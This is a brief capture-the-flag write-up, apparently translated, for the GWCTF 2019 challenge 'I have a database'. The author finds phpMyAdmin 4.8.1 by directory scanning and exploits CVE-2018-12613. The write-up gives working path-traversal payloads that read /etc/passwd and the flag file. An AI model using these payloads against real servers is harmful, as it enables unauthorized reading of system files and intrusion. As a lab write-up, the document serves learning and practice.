[GWCTF 2019] I have a database 1

It came in with a bunch of garbled characters. I checked the source code and found nothing when I captured the package. At this time, I can only use dirsearch

Go and scan it

You can see that there is a /phpmyadmin interface to visit

To get such an interface, the focus should be on the following one, generally this is to check the version loopholes

This is a phpmyadmin with such a vulnerability4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)

Next, perform a vulnerability reproduction

payload: phpmyadmin/?target=db_sql.php%253f/../../../../../../../../etc/passwd

The execution is successful, since /etc/passwd can be read successfully, just try to read the flag directly

payload: phpmyadmin/?target=db_sql.php%253f/../../../../../../../../flag

Get it

(For the first time, just record it)